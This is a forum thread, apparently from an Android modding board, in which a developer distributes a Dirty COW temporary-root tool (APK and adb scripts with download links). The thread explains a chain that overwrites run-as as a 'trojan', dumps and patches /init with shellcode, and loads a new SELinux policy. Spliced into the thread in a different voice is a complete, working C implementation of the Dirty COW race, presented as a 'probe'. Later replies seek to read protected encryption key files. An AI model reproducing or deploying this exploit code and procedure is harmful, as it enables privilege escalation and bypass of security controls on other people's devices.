Root tool DirtyCow Apk && adb

kryz (Senior Member since Oct 25, 2009)
Hi,
I have developed a tool that exploits the Dirty COW vulnerability to get TEMPORARY ROOT.
It bypasses SELinux on Lollipop 32-bit systems only; we are now working on 64-bit and Marshmallow versions, which will come soon, but there is a lot of work left to make it universal.
I'm bringing two tools: one APK (no computer required) and one RAR for adb and Linux.
With this tool we will access those partitions and start the attack there, but in the current state, if your bootloader is locked, having root, even temporary root, is a good option.

·APK
Required: SD card
The APK exploits this vulnerability in the vold context, so it is necessary to have an SD card and to mount or extract it when the app asks, once per session.
This tool has some utilities to flash the boot and system partitions, and also for backup, and 2 methods of root:
·Attack init process (Lollipop 32-bit only)
·Attack app_process (all devices, not really good)

·Get root
Uninstall any SuperSU manager before rooting.
The way to use this app: first click "check perms" (optional) and you will see whether you have permissions on the /init file.
If you have permissions and Lollipop 32-bit, you can use the first method to get root.
Also in check permissions you will see whether you have rights to backup/flash the boot and system partitions.
The process takes up to 2 minutes to finish, so please wait and watch the log window.
# ISSUES #
If you get a reboot after getting root, you can:
-Clean init (restoring the init process sometimes crashes the device, but it is safe)
-Install SELinux permissive (makes the new SELinux policy permanent, not tested)
The first option is safe; at most you get a reboot.
The second option has only been tested on 3 devices (Oppo, Xperia, Moto E), so test it with a working recovery, as it can break some SELinux rule.


·ADB
The adb RAR contains some utilities to get root via run-as and init, and only works on Lollipop 32-bit.
To execute it:

-RAR password: "nox"
-Extract the RAR into /data/local/tmp/


Code:
chmod 755 /data/local/tmp/exploit.sh
cd /data/local/tmp/
./exploit.sh
This process takes some time, 1-2 minutes, but you will see the progress in the console, so please wait.
Afterwards it will ask you to turn off Bluetooth; do it, even though sometimes it is not required, as it can speed up the process.
It will ask to install SELinux permissive; if you don't have reboot problems, don't install it, otherwise be sure you have a working recovery and a stock ROM ready to flash. This feature is stable but needs more testing.
If all is OK you will see this:

Code:
#Type run-as -s1 to get a shell
#Type run-as -s2 to execute su daemon
run-as -s1 gives you a shell in the init context, but with some restrictions because SELinux auto-transitions the domain for run-as.
run-as -s2 executes the su daemon and an su in the init context with no restrictions.
# ISSUES #
If you get a reboot after getting root, you can:
·mount the system partition with the abort flag:
Code:
mount -o remount,abort /system
You won't be able to mount system in write mode.


This app is in BETA BETA state for now; 7/9 devices passed, not bad at all ;)
I'll add more devices to the list soon ;)

List of rooted devices:
Moto G 5.1 lollipop
Xperia 5.1 lollipop
Oppo 5.1 lollipop
Emulator 5.1 lollipop
XT1528 (MOTO E Verizon prepaid) 5.0.2 lollipop(reboot issues)
Asus Zenfone Go ZB452KG Lollipop(5.1.1)
Smartfren Andromax A / Haier a16c3h (Lollipop 5.1 Firmware 12.2)


Version:0.4
Adb:http://www.mediafire.com/file/r3i900n7jb2zfoo/EXPLOIT_ADB.rar
Apk:http://www.mediafire.com/file/38tyscsaxms00sa/croowt%282%29.apk
Implemented SELinux permissive after reboot (adb, apk).
Enforcing mode working (adb, apk).

Version: 0.3
Fixed bug creating bl instruction.

Version: 0.2
-Fix bug in apk for some devices

Version: 0.1
-adb version more compatible with Lollipop 32-bit.
-Fixed bug in the shellcode.
-64 bits version of run-as-dirtycow.

Todo:
-Working on Marshmallow 32-bit.
-Some fixes for the APK.

Thanks to n0x for his great help debugging the shellcode issue on the Moto G
 

nemopsp (Senior Member since Nov 30, 2014)
Sweet! Has anyone tested on a Note 4? N910A on 5.1.1

I'm currently on 6.0.1 MM, so I'm waiting for that release.

Anyone know if this will work with the November 2016 security patch?

Sent from my SAMSUNG-SM-N910A using Tapatalk
 

bornwilder (Member since Aug 17, 2010)
Really cool. I am having a problem trying to connect my device over adb WiFi, and now this!!! I have a locked head unit and I can't install any apps (all installations blocked; developer mode and USB debugging all hidden). Any way for me to install this onto my phone and attack my device via Bluetooth or something? Or autorun once connected to USB? It's a long shot, but hey, it's Christmas!!

Merry Christmas by the way
 

kryz
Exploit process

For the developers that are testing this exploit or want to know in depth how it works:

First we Dirty COW some privileged process; for example, run-as has suid 0 granted by SELinux capabilities, not by the setuid bit.

Once we have overwritten run-as, this binary can read the /init path, so we copy it somewhere else with our run-as "trojan".

In our run-as we need to put some code to read files; my run-as-dirtycow does:

run-as /init

This will print that file to stdout (the console); if we redirect this output to a file:

run-as /init > /data/local/tmp/init.dmp

we copy the /init file through our dirtycowed run-as, which has root privileges and is permitted by SELinux.

We patch init.dmp to create our init.patch with a shellcode that loads a new policy.

We will use run-as to Dirty COW our init.dmp again, but patched with the shellcode.

So our run-as trojan will also contain the dirtycow exploit, and when we exec this binary with the right arguments it will also dirtycow any file that root has read permissions on.

run-as /init /data/local/tmp/init.patch

Once finished, and when the new policy is loaded, executing the run-as trojan with the special parameter -s1 or -s2 gives you a root shell or installs su on the device TEMPORARILY; it does not modify any partition but mounts an ext4 partition on /system/xbin with the su binary.

Well, this is the process to do it in adb shell; in the APK I am using fsck_msdos to do this whole chain of steps.

I would like to get some different init files from Lollipop 32-bit and Marshmallow 32-bit to adjust the patcher to Marshmallow.
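The whole chain in the first post and in the "Exploit process" post above rests on one primitive: winning the Dirty COW (CVE-2016-5195) race so that a write through /proc/self/mem lands in the page cache of a file you can only read. As an added example (not code from kryz's tool or from the original posts), here is that primitive written as a self-contained probe in the shape of the public PoC: it creates a temporary file, maps it PROT_READ/MAP_PRIVATE, then races madvise(MADV_DONTNEED) against pwrite() on /proc/self/mem. The target path, the payload string, the file contents and the iteration count are assumptions chosen for the example. On a kernel still carrying the bug the file's contents change; on a fixed kernel they do not, which makes this the check to run on a device before trying the tool at all (it answers the "does it work on the November 2016 patch" question empirically rather than by version string).

```c
/* Added example: self-contained Dirty COW (CVE-2016-5195) probe.
 * Not part of kryz's run-as-dirtycow; the target path, payload and
 * iteration counts are assumptions for illustration. */
#define _GNU_SOURCE
#define _FILE_OFFSET_BITS 64   /* 64-bit off_t so map addresses fit on 32-bit ARM */
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

struct race {
    void *map;            /* PROT_READ, MAP_PRIVATE mapping of the target file */
    size_t map_len;       /* one page */
    const char *payload;  /* bytes we try to force into the shared page cache */
    long iterations;
};

/* Thread 1: keep discarding the private COW copy of the page so the next
 * write through /proc/self/mem has to fault it in again. */
static void *madvise_thread(void *arg)
{
    struct race *r = arg;
    for (long i = 0; i < r->iterations; i++)
        madvise(r->map, r->map_len, MADV_DONTNEED);
    return NULL;
}

/* Thread 2: write into the read-only mapping via /proc/self/mem (FOLL_FORCE).
 * On a vulnerable kernel the race lets the write hit the page-cache page
 * instead of the private copy, which dirties the file on disk. */
static void *procselfmem_thread(void *arg)
{
    struct race *r = arg;
    int fd = open("/proc/self/mem", O_RDWR);
    if (fd < 0)
        return NULL;
    size_t len = strlen(r->payload);
    for (long i = 0; i < r->iterations; i++)
        pwrite(fd, r->payload, len, (off_t)(uintptr_t)r->map);
    close(fd);
    return NULL;
}

static int write_file(const char *path, const char *content)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0)
        return -1;
    size_t len = strlen(content);
    int ok = write(fd, content, len) == (ssize_t)len;
    close(fd);
    return ok ? 0 : -1;
}

static int read_file(const char *path, char *buf, size_t bufsz)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    ssize_t n = read(fd, buf, bufsz - 1);
    close(fd);
    if (n < 0)
        return -1;
    buf[n] = '\0';
    return 0;
}

/* Creates `path` with known content, runs the race for `iterations` rounds,
 * then re-reads the file from disk. Returns 1 if the file was modified
 * (kernel vulnerable), 0 if it is intact (fixed kernel, or race not won),
 * -1 on a setup error. The probe file is removed before returning. */
int dirtycow_probe(const char *path, long iterations)
{
    static const char original[] = "original-content-of-the-read-only-file\n";
    const char *payload = "dirtycow";          /* constructed payload */
    char after[sizeof original];
    struct race r = { NULL, (size_t)sysconf(_SC_PAGESIZE), payload, iterations };
    pthread_t t1, t2;
    int result = -1;

    if (write_file(path, original) != 0)
        return -1;
    int fd = open(path, O_RDONLY);             /* read-only: no write access */
    if (fd < 0)
        goto out;
    r.map = mmap(NULL, r.map_len, PROT_READ, MAP_PRIVATE, fd, 0);
    close(fd);
    if (r.map == MAP_FAILED)
        goto out;

    pthread_create(&t1, NULL, madvise_thread, &r);
    pthread_create(&t2, NULL, procselfmem_thread, &r);
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    munmap(r.map, r.map_len);

    if (read_file(path, after, sizeof after) != 0)
        goto out;
    result = strncmp(after, payload, strlen(payload)) == 0 ? 1 : 0;
out:
    unlink(path);
    return result;
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "/data/local/tmp/dc_probe";  /* assumed path */
    int r = dirtycow_probe(path, 20000000L);
    if (r < 0) {
        perror("dirtycow_probe");
        return 2;
    }
    puts(r ? "VULNERABLE: file changed through a read-only private mapping"
           : "not modified: kernel looks patched (or the race was not won)");
    return r ? 0 : 1;
}
```

Build it with the NDK toolchain and -pthread, push the binary to /data/local/tmp and run it from adb shell; it only touches the probe file it creates, so a negative result leaves nothing behind. The threads loop a fixed number of times instead of forever, so a patched kernel is reported after a few seconds rather than hanging, and the iteration count can be raised if a known-vulnerable device reports "not modified" on a slow core.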
 

kryz
> Can we have access to the run-as-dirtycow source code?
>
> Thanks.
It is very simple: just take the original dirtycow exploit and some code to copy files, read and puts.

Anyway, soon I'll post it here; it has not many secrets, lol, just copy a file or execute sh. The main problem now is the patcher, to make it work on Marshmallow and 64-bit; I don't have any 64-bit device, only one Xperia Z on which I can install a custom ROM with Marshmallow.

But I think the first thing is to check that the patcher works well on Lollipop 32-bit; even though I've tested 2 devices and reversed some other inits, it is not enough to be completely sure that all is OK.
 

jucaroba (Senior Member since Nov 3, 2012)
> It is very simple: just take the original dirtycow exploit and some code to copy files, read and puts.
>
> Anyway, soon I'll post it here; it has not many secrets, lol, just copy a file or execute sh. The main problem now is the patcher, to make it work on Marshmallow and 64-bit; I don't have any 64-bit device, only one Xperia Z on which I can install a custom ROM with Marshmallow.
>
> But I think the first thing is to check that the patcher works well on Lollipop 32-bit; even though I've tested 2 devices and reversed some other inits, it is not enough to be completely sure that all is OK.
Thanks for your answer.

I'm trying to use your exploit to be able to read my /data/misc/vold/expand_*.key file. My wife has a Moto G 2014 phone with official (non-rooted) Android 6 Marshmallow. The bootloader is locked. She accidentally deleted all the pictures on her SD card, which is configured as an adopted card (not portable). I have made a cloned copy of the SD card on my Linux laptop with the dd command, but I cannot mount the partitions on the SD card because I have to know the encryption key.

I cannot unlock the bootloader, because the phone would be reset to factory and the encryption key would be deleted. And I cannot read the key file without being root, because of the file's permissions. I have tried your run-as-dirtycow trojan on the phone, and I can read files I have no permissions for, such as /init.rc. The only missing piece now is that I don't know the exact name of the key file. I only know that it is of the form "expand_*.key". Can your trojan run-as-dirtycow be modified to be able to read the files with this name pattern in a given directory?

Thanks in advance.
 

tnomtlaw (Senior Member since Oct 26, 2013)
> It is very simple: just take the original dirtycow exploit and some code to copy files, read and puts.
>
> Anyway, soon I'll post it here; it has not many secrets, lol, just copy a file or execute sh. The main problem now is the patcher, to make it work on Marshmallow and 64-bit; I don't have any 64-bit device, only one Xperia Z on which I can install a custom ROM with Marshmallow.
>
> But I think the first thing is to check that the patcher works well on Lollipop 32-bit; even though I've tested 2 devices and reversed some other inits, it is not enough to be completely sure that all is OK.
I'm trying to root my Boost Max+ running 5.1. I tried the check perm option but couldn't remount the SD card; it just froze. Upon reboot it hung at starting apps. I had to remove the SD card to get the phone to boot properly.

Sent from my N9521 using Tapatalk
 

kryz
> I'm trying to root my Boost Max+ running 5.1. I tried the check perm option but couldn't remount the SD card; it just froze. Upon reboot it hung at starting apps. I had to remove the SD card to get the phone to boot properly.
>
> Sent from my N9521 using Tapatalk
When you mount the SD card, it is normal that it doesn't mount again; the process hijacks fsck_msdos. You have to go back to the application, wait and watch the log window.

Depending on the mount, it will take 1-5 seconds to see the information.

If you see that init is OK, you can proceed with get root.

 

kryz
> Thanks for your answer.
>
> I'm trying to use your exploit to be able to read my /data/misc/vold/expand_*.key file. My wife has a Moto G 2014 phone with official (non-rooted) Android 6 Marshmallow. The bootloader is locked. She accidentally deleted all the pictures on her SD card, which is configured as an adopted card (not portable). I have made a cloned copy of the SD card on my Linux laptop with the dd command, but I cannot mount the partitions on the SD card because I have to know the encryption key.
>
> I cannot unlock the bootloader, because the phone would be reset to factory and the encryption key would be deleted. And I cannot read the key file without being root, because of the file's permissions. I have tried your run-as-dirtycow trojan on the phone, and I can read files I have no permissions for, such as /init.rc. The only missing piece now is that I don't know the exact name of the key file. I only know that it is of the form "expand_*.key". Can your trojan run-as-dirtycow be modified to be able to read the files with this name pattern in a given directory?
>
> Thanks in advance.
The run-as context can't see /data or even the /data/misc folders; anyway, I will implement listing of directories in the next update.
 

jucaroba
> The run-as context can see /data or even the /data/misc folders; anyway, I will implement listing of directories in the next update.
Yes, I know it can see those folders; I only need to know the name of the file I am interested in.

If you implement the "list of directories" functionality it will be fantastic. Thanks for it.

I will also be very grateful to see the full source code of the trojan.

Waiting eagerly for both things.

Thanks in advance.
 

kryz
> Yes, I know it can see those folders; I only need to know the name of the file I am interested in.
>
> If you implement the "list of directories" functionality it will be fantastic. Thanks for it.
>
> I will also be very grateful to see the full source code of the trojan.
>
> Waiting eagerly for both things.
>
> Thanks in advance.
Sorry, wrong typing; I wanted to say that the run-as context can not see those folders.
I mean I've already implemented that function, "-d", and run-as can not list those folders:

run-as -d /system/etc

Attached run-as-dirtycow.c
 


jucaroba
> Sorry, wrong typing; I wanted to say that the run-as context can not see those folders.
> I mean I've already implemented that function and run-as can not list those folders.
Mmmm, so the only way to be able to read a file in /data/misc/vold/ is to be root?

If that is the case, then I suppose I have to wait until your exploit can be used to root a Marshmallow phone.

Am I correct?

Thanks.
 

kryz
> Mmmm, so the only way to be able to read a file in /data/misc/vold/ is to be root?
>
> If that is the case, then I suppose I have to wait until your exploit can be used to root a Marshmallow phone.
>
> Am I correct?
>
> Thanks.
I think so; I don't have that folder on my devices, but I was trying to read in the /data folder and had no success in one of its subfolders.
Btw, what CPU does your device have, 32 or 64-bit?
Can you post your init file?
 

jucaroba
> I think so; I don't have that folder on my devices, but I was trying to read in the /data folder and had no success in one of its subfolders.
> Btw, what CPU does your device have, 32 or 64-bit?
> Can you post your init file?
My CPU is 32-bit. It is a Moto G 2014.

I suppose you don't have the /data/misc/vold folder because you are not looking at a Marshmallow system.

What file are you interested in? The /init.rc file?
 

kryz
> My CPU is 32-bit. It is a Moto G 2014.
>
> I suppose you don't have the /data/misc/vold folder because you are not looking at a Marshmallow system.
>
> What file are you interested in? The /init.rc file?
I'm interested in the /init file, and 32-bit is great ;)
 

jucaroba
> I'm interested in the /init file, and 32-bit is great ;)
No /init file in Marshmallow. At least not at that path.

---------- Post added at 02:19 AM ---------- Previous post was at 01:48 AM ----------

> I'm interested in the /init file, and 32-bit is great ;)
Sorry, the file exists, but I can not read it. I can not copy it with your trojan run-as (run-as-dirtycow) either.
 

norberto_ (Senior Member since Jun 16, 2010)
Hi kryz,

Please find attached the /init from 32-bit 6.0.1.
It is from an Xperia Z2 with a custom rooted ROM (Mx ROM v8.6.0).

How can I copy /init from my bootloader-locked, unrooted, stock 6.0.1 64-bit X Performance?
 
